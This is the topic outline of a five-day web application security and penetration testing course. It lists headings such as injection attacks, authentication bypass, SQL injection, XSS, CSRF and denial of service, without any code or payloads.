Topics
Day 1
Information Gathering
Application discovery
Site mapping & web crawling
Server & application fingerprinting
Identifying the entry points
File extensions handling
Page enumeration and brute forcing
Looking for leftovers
Google hacking
Analysis of error code
Injections & Validations
Encoding attacks
Command injection
Code injection
LDAP injection
Log/CRLF injection
Header injection
SMTP injection
XML injection
XPATH injection
Input validation techniques
Blacklist VS. Whitelist input validation bypassing
Day 2
Authentication Vulnerabilities
What is authentication?
Supported authentication types – anonymous, basic, digest, forms, Kerberos, client certificate
Authentication scenarios
User enumeration
Guessing passwords – brute force & dictionary attacks
Direct page requests
Parameter modification
Password reset flaws
Password change flaws
Bypassing weak CAPTCHA mechanisms
Common implementation mistakes – authentication bypassing using SQL injection, LDAP injection, XPATH injection
Authorization Vulnerabilities
What is authorization?
Authorization models – DAC/MAC
RBAC
Authorization bypassing
Canonicalization & path traversal
Parameter tampering
Forceful browsing
Rendering based authorization
Client side validation attacks
Hardening
Business Logic Vulnerabilities
Business flow bypass
Replay attack
Currency manipulation
Business logic attack vectors
Direct access to web services
Day 3
SQL Injection Vulnerabilities
Introduction to SQL command structure
NoSQL injection – Mongo, ORM
Database manipulation
Circumventing authentication
Retrieving data
Inserting data
Deleting data
Attacking availability
Local system access
Discovering vulnerable apps
Error based
Blind
Binary search
Evasion
File Handling Attacks
Path traversal
Canonicalization
Uploaded file backdoors
Insecure file extension handling
Directory listing
File size
File type
Malware upload
Day 4
Cross Site Scripting (XSS) Vulnerabilities
Overview of XSS
XSS Description
Reflected XSS
Stored / persistent XSS
DOM based XSS
XSS Whitelist VS. Blacklist input validation
Discovery approaches – Manual VS. Automatic VS. Semi-automatic
Different XSS scenarios
XSS input validation evasion
Browser Manipulation Techniques
CSRF (Cross Site Request Forgery)
Clickjacking
Open redirects
HTTP response splitting
Day 5
Cryptography Pitfalls
Symmetric cryptography
Asymmetric cryptography
Hashing
Digital signing
PKI / certificate
SSL protocol
SSL cipher suite
Insufficient transport layer protection
Application Denial of Service (DoS) Vulnerabilities
Application / OS crash
CPU starvation
Memory starvation
File system starvation
Resource starvation
Triggering high network bandwidth
User level DoS
Exploiting a specific vulnerability
Zip bomb
Over flows
reDoS
Parsing errors
Attacking Client-Side Applications
HTML5 approach
Client side attacks
Analyze client side source code
Insecure storage
Flash decompile
Crossdomain.xml
CORS requests